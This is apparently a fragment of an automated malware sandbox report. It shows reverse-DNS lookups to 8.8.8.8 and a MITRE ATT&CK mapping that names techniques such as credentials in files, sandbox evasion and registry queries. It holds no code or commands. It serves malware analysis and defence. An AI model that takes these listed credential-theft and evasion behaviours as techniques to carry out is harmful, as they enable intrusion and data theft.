73.144.22.2.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion